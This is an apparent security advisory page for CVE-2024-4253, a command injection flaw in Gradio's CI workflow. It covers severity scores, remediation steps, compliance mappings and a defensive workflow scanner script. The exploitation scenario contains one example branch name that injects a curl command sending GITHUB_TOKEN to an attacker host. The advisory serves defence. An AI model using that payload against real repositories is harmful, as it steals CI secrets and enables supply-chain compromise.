CVE-2024-4253: Gradio: CI/CD command injection enables secrets exfiltration

CRITICAL PoC AVAILABLE
Published June 4, 2024
CISO Take

Gradio's GitHub Actions workflow contains a command injection flaw allowing any unauthenticated attacker to exfiltrate CI/CD secrets (GITHUB_TOKEN, COMMENT_TOKEN, CHROMATIC_PROJECT_TOKEN) by submitting a malicious pull request. Successful exploitation could enable supply chain compromise of published Gradio packages—affecting every downstream ML deployment that installs via pip. Patch immediately to a version past @gradio/video@0.6.12 and audit all GitHub Actions workflows for unsanitized use of GitHub context variables.

What is the risk?

Critical risk. CVSS 9.1 with no authentication required, no user interaction, and network-accessible exploitation via any public PR submission. Gradio's dominance in ML prototyping, model demos, and Hugging Face Spaces means the blast radius extends well beyond the Gradio maintainers themselves: a successful supply chain compromise would cascade to thousands of downstream ML deployments. Attack complexity is trivial given well-documented GitHub Actions injection techniques and public PoC availability.

What systems are affected?

Package: Gradio
Ecosystem: pip
Vulnerable Range: not listed
Patched: No patch

Do you use Gradio? You're affected.

How severe is it?

CVSS 3.1
9.1 / 10
EPSS
1.7%
chance of exploitation in 30 days
Higher than 74% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): None
UI (User Interaction): None
S (Scope): Unchanged
C (Confidentiality): High
I (Integrity): High
A (Availability): None

What should I do?

5 steps
  1. PATCH

    Update @gradio/video past 0.6.12; verify patch commit a0e70366 is present in your installed version.

  2. AUDIT

    Review all GitHub Actions workflows for unsanitized use of `github.head_ref`, `github.event.pull_request.head.repo.full_name`, or other PR-controllable context variables passed directly into `run:` steps.

  3. HARDEN

    Expose GitHub context values only via environment variables (never inline in `run:` commands); apply the principle of least privilege to GITHUB_TOKEN with explicit `permissions:` blocks.

  4. DETECT

    Monitor CI runner logs for unexpected outbound connections; set up secret scanning alerts for token exposure.

  5. DEPENDENCY HYGIENE

    Enable Dependabot or similar for Gradio and review all ML framework dependencies for CI/CD workflow files that may be reused in your pipelines.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
  Art. 17 - Quality management system — supply chain
  Art. 9 - Risk management system
ISO 42001
  A.5.23 - Information security for use of cloud services
  A.6.1.2 - AI risk assessment for third-party components
NIST AI RMF
  GOVERN 6.1 - Policies and procedures for third-party AI component risk
OWASP LLM Top 10
  LLM05:2023 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-4253?

Gradio's GitHub Actions workflow contains a command injection flaw allowing any unauthenticated attacker to exfiltrate CI/CD secrets (GITHUB_TOKEN, COMMENT_TOKEN, CHROMATIC_PROJECT_TOKEN) by submitting a malicious pull request. Successful exploitation could enable supply chain compromise of published Gradio packages—affecting every downstream ML deployment that installs via pip. Patch immediately to a version past @gradio/video@0.6.12 and audit all GitHub Actions workflows for unsanitized use of GitHub context variables.

Is CVE-2024-4253 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-4253, increasing the risk of exploitation.

How to fix CVE-2024-4253?

1. PATCH: Update @gradio/video past 0.6.12; verify patch commit a0e70366 is present in your installed version.
2. AUDIT: Review all GitHub Actions workflows for unsanitized use of `github.head_ref`, `github.event.pull_request.head.repo.full_name`, or other PR-controllable context variables passed directly into `run:` steps.
3. HARDEN: Expose GitHub context values only via environment variables (never inline in run commands); apply principle of least privilege to GITHUB_TOKEN with explicit `permissions:` blocks.
4. DETECT: Monitor CI runner logs for unexpected outbound connections; set up secret scanning alerts for token exposure.
5. DEPENDENCY HYGIENE: Enable Dependabot or similar for Gradio and review all ML framework dependencies for CI/CD workflow files that may be reused in your pipelines.

What systems are affected by CVE-2024-4253?

This vulnerability affects the following AI/ML architecture patterns: model serving, training pipelines, CI/CD pipelines for ML projects, agent frameworks, MLOps workflows.

What is the CVSS score for CVE-2024-4253?

CVE-2024-4253 has a CVSS v3.1 base score of 9.1 (CRITICAL). The EPSS exploitation probability is 1.69%.

What is the AI security impact?

Affected AI Architectures

model serving, training pipelines, CI/CD pipelines for ML projects, agent frameworks, MLOps workflows

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0025 Exfiltration via Cyber Means
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0055 Unsecured Credentials

Compliance Controls Affected

EU AI Act: Art. 17, Art. 9
ISO 42001: A.5.23, A.6.1.2
NIST AI RMF: GOVERN 6.1
OWASP LLM Top 10: LLM05:2023

What are the technical details?

Original Advisory

A command injection vulnerability exists in the gradio-app/gradio repository, specifically within the 'test-functional.yml' workflow. The vulnerability arises due to improper neutralization of special elements used in a command, allowing for unauthorized modification of the base repository or secrets exfiltration. The issue affects versions up to and including '@gradio/video@0.6.12'. The flaw is present in the workflow's handling of GitHub context information, where it echoes the full name of the head repository, the head branch, and the workflow reference without adequate sanitization. This could potentially lead to the exfiltration of sensitive secrets such as 'GITHUB_TOKEN', 'COMMENT_TOKEN', and 'CHROMATIC_PROJECT_TOKEN'.

Exploitation Scenario

An adversary targeting ML infrastructure submits a pull request to a public Gradio-based repository. The PR's branch name contains injected shell metacharacters: `feature/; curl https://attacker.com/exfil?t=$GITHUB_TOKEN #`. The test-functional.yml workflow echoes the head repository name or branch unsanitized inside a `run:` step, executing the injected command in the CI runner context. The attacker receives the GITHUB_TOKEN out-of-band and uses it to push malicious commits to the main branch or tamper with a GitHub Release artifact. Downstream ML teams installing Gradio via `pip install gradio` receive the backdoored package, compromising model serving endpoints, Gradio-based agent UIs, and any system where the framework runs with access to model weights or sensitive inference infrastructure.
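The scenario above and the AUDIT and HARDEN steps under "What should I do?" describe a single pattern: a `${{ github.… }}` expression that a pull-request author controls is substituted into a `run:` script before the shell parses it. The Python script below is an added example, not Gradio's workflow, the patch commit, or the public PoC. It embeds two constructed workflow fragments (a vulnerable one that echoes the head repository name and head branch inline, and a hardened one that passes the same values through `env:` and adds a workflow-level `permissions:` block), flags PR-controlled expressions that land inside `run:` blocks, and checks for the `permissions:` block. The list of PR-controlled context paths is an assumption and is not exhaustive.

```python
import re

# Constructed sample workflows (not Gradio's actual test-functional.yml).
# The first interpolates PR-controlled context straight into a run: script,
# the pattern the advisory describes; the second moves the same values into
# env: and scopes GITHUB_TOKEN with a top-level permissions: block.
VULNERABLE_WORKFLOW = """\
name: test-functional
on: [pull_request]
jobs:
  functional:
    runs-on: ubuntu-latest
    steps:
      - name: Print context
        run: |
          echo "head repo: ${{ github.event.pull_request.head.repo.full_name }}"
          echo "head ref:  ${{ github.head_ref }}"
"""

HARDENED_WORKFLOW = """\
name: test-functional
on: [pull_request]
permissions:
  contents: read
jobs:
  functional:
    runs-on: ubuntu-latest
    steps:
      - name: Print context
        env:
          HEAD_REPO: ${{ github.event.pull_request.head.repo.full_name }}
          HEAD_REF: ${{ github.head_ref }}
        run: |
          echo "head repo: $HEAD_REPO"
          echo "head ref:  $HEAD_REF"
"""

# Context paths a pull-request author can set. Assumption, and non-exhaustive:
# the two fields this advisory names plus other commonly cited PR-controlled
# fields. Extend it for the events your own workflows trigger on.
PR_CONTROLLED = (
    "github.head_ref",
    "github.event.pull_request.head.ref",
    "github.event.pull_request.head.label",
    "github.event.pull_request.head.repo.full_name",
    "github.event.pull_request.title",
    "github.event.pull_request.body",
    "github.event.issue.title",
    "github.event.issue.body",
    "github.event.comment.body",
    "github.event.commits",
    "github.event.head_commit.message",
)

EXPR = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")            # ${{ expression }}
RUN_KEY = re.compile(r"^(\s*)(-\s+)?run:[ \t]*(.*)$")   # a 'run:' step key


def run_script_lines(workflow_text):
    """Yield (line_no, text) for every line that ends up in a run: shell
    script. Inline scalars ('run: cmd') give one line; block scalars
    ('run: |' or 'run: >') continue while lines are indented deeper than
    the run key itself (blank lines do not end the block)."""
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        key_indent = len(m.group(1)) + len(m.group(2) or "")
        rest = m.group(3).strip()
        if rest.startswith(("|", ">")):
            j = i + 1
            while j < len(lines):
                line = lines[j]
                if line.strip() and len(line) - len(line.lstrip()) <= key_indent:
                    break
                yield j + 1, line
                j += 1
            i = j
        else:
            yield i + 1, rest
            i += 1


def is_pr_controlled(expr):
    """True if the expression is (or indexes into) a PR-controlled context path."""
    expr = expr.strip()
    return any(expr == p or expr.startswith((p + ".", p + "[")) for p in PR_CONTROLLED)


def find_unsafe_expressions(workflow_text):
    """Return [(line_no, expression)] for each PR-controlled ${{ }} that the
    runner would substitute into a run: script before the shell parses it."""
    findings = []
    for line_no, text in run_script_lines(workflow_text):
        for m in EXPR.finditer(text):
            if is_pr_controlled(m.group(1)):
                findings.append((line_no, m.group(1).strip()))
    return findings


def has_top_level_permissions(workflow_text):
    """True when a workflow-level permissions: block scopes GITHUB_TOKEN."""
    return any(line.startswith("permissions:") for line in workflow_text.splitlines())


if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(f"{label}: top-level permissions block = {has_top_level_permissions(text)}")
        for line_no, expr in find_unsafe_expressions(text):
            print(f"  line {line_no}: {expr} is interpolated into a run: script")
```

The hardened form works because the runner substitutes `${{ }}` expressions textually before the step's shell starts: inside `run:` the substituted text is parsed as shell syntax, whereas a value assigned under `env:` reaches the shell only as an environment variable, and `"$HEAD_REF"` in double quotes keeps it data. Run the script over `.github/workflows/*.yml` in your own repositories by reading each file into `find_unsafe_expressions`; it needs only the standard library, and the indentation-based block detection is deliberately simple, so a YAML parser is the better choice for unusual layouts.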

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Timeline

Published
June 4, 2024
Last Modified
October 15, 2025
First Seen
June 4, 2024
